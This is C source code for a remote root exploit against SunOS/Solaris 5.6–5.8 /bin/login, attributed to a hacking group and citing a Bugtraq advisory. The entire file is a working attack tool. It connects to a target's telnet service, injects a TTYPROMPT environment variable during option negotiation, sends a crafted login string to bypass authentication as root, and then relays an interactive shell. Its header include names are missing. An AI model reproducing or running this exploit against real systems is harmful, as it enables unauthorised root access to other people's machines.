/* * SunOS 5.6,5.7,5.8 remote /bin/login root exploit * telnet negotiation learned from good ol' TCP/IP Illustrated * [mikecc/unixclan] * * bugtraq advisory: http://online.securityfocus.com/archive/1/293844 * * yo to my friends: mstevens, jason, booterr, copperd, dave, ziphie, * shazam, macd, s0kket, syn, ironfist, ph33r, moke, and digitalfallout * */ #include #include #include #include #include #include #include #include #include #include void respond(int,char *); void negotiate(int); void env(int,char *,char *); void will(int,int); void wont(int,int); int main(int argc,char **argv) { struct sockaddr_in sock; struct hostent *pHe; int sd; short port = -1; int x; char *host = NULL; char *user = NULL; char exp[1024]; int a; char *default_port = "23"; printf("UC-login\n"); printf("SunOS/Solaris 5.6,5.7,5.8 /bin/login remote exploit\n"); printf("[mikecc/unixclan] [http://uc.zemos.net/]\n\n"); if (argc < 2) { printf("%s -h [-p port] [-u user]\n",argv[0]); return 0; } while ((a = getopt(argc,argv,"h:p:u:")) != -1) { switch (a) { case 'h': host = optarg; break; case 'p': port = atoi(optarg); break; case 'u': user = optarg; break; default: printf("[-] invalid option.\n"); break; } } if (host == NULL) { printf("[-] must specify a host to attack\n"); return 0; } if (user == NULL) user = "root"; if (port < 0) port = atoi(default_port); if ((pHe = gethostbyname(host)) == NULL) { printf("Host lookup error.\n"); return 0; } printf("[*] attacking %s:%d\n",host,port); printf("[*] opening socket\n"); if ((sd = socket(AF_INET,SOCK_STREAM,0)) == -1) { printf("[-] could not create socket"); return 0; } sock.sin_family = AF_INET; sock.sin_port = htons(port); memcpy(&sock.sin_addr.s_addr,pHe->h_addr,pHe->h_length); if ((connect(sd,(struct sockaddr *)&sock,sizeof(sock))) == -1) { printf("[-] failed to connect to %s\n",host); return 0; } printf("[*] connected!\n"); printf("[*] setting up exploit string\n"); strcpy(exp,user); for (x = 0; x < 64; x++) { strcat(exp," c"); } printf("[*] trying to login as %s\n",user); respond(sd,exp); return 0; } /* * 1. do telnet negotiation * 2. send the exploit string * 3. read and write data as if you logged in as root */ void respond(int sd,char *expstr) { char buf[1024]; int x; fd_set rset; printf("[*] negotiating\n"); negotiate(sd); printf("[*] sending exploit string\n"); write(sd,expstr,strlen(expstr)); printf("[*] did it work? now press enter\n"); fflush(stdout); FD_ZERO(&rset); while (1) { FD_SET(sd,&rset); FD_SET(0,&rset); select(sd+1,&rset,0,0,0); if (FD_ISSET(sd,&rset)) { memset(buf,'\0',sizeof(buf)); if ((x = read(sd,buf,sizeof(buf)-1)) == 0) { printf("Connection closed by foreign host.\n"); exit(-1); } fprintf(stderr,"%s",buf); } if (FD_ISSET(0,&rset)) { memset(buf,'\0',sizeof(buf)); if ((x = read(0,buf,sizeof(buf)-1)) > 0) { write(sd,buf,x); } } } } /* * use an environment variable * * structure of env variable usage is: * 1. IAC * 2. TELOPT_NEW_ENVIRON * 3. TELQUAL_IS * 4. NEW_ENV_VAR * 5. (name) * 6. NEW_ENV_VALUE * 7. (value) * 8. IAC * 9. SE * * (all found in arpa/telnet.h and you specify name and value) */ void env(int sd,char *name,char *val) { char buf[1024]; memset(buf,'\0',sizeof(buf)); sprintf(buf,"%c%c%c%c%c%s%c%s%c%c", IAC,SB,TELOPT_NEW_ENVIRON,TELQUAL_IS,NEW_ENV_VAR,name, NEW_ENV_VALUE,val,IAC,SE); write(sd,buf,23); /* no error checking, uh-oh! */ } /* * telnet negotiation needed for * talking with the telnet protocol */ void negotiate(int sd) { wont(sd,TELOPT_TTYPE); wont(sd,TELOPT_NAWS); wont(sd,TELOPT_XDISPLOC); will(sd,TELOPT_LFLOW); will(sd,TELOPT_LINEMODE); wont(sd,TELOPT_OLD_ENVIRON); will(sd,TELOPT_NEW_ENVIRON); will(sd,TELOPT_BINARY); env(sd,"TTYPROMPT","abcdef"); } /* * send a telnet WONT * * structure of a telnet WONT is: * 1. IAC * 2. WONT * 3. what you wont do * (all of the above are found in arpa/telnet.h) */ void wont(int sd,int opt) { char buf[3]; sprintf(buf,"%c%c%c",IAC,WONT,opt); write(sd,buf,3); /* no error checking, uh-oh! */ } /* * send a telnet WILL * * structure of a telnet WILL is: * 1. IAC * 2. WILL * 3. what you will do * (all of the above are found in arpa/telnet.h) */ void will(int sd,int opt) { char buf[3]; sprintf(buf,"%c%c%c",IAC,WILL,opt); write(sd,buf,3); /* no error checking, uh-oh! */ }

��ŷ��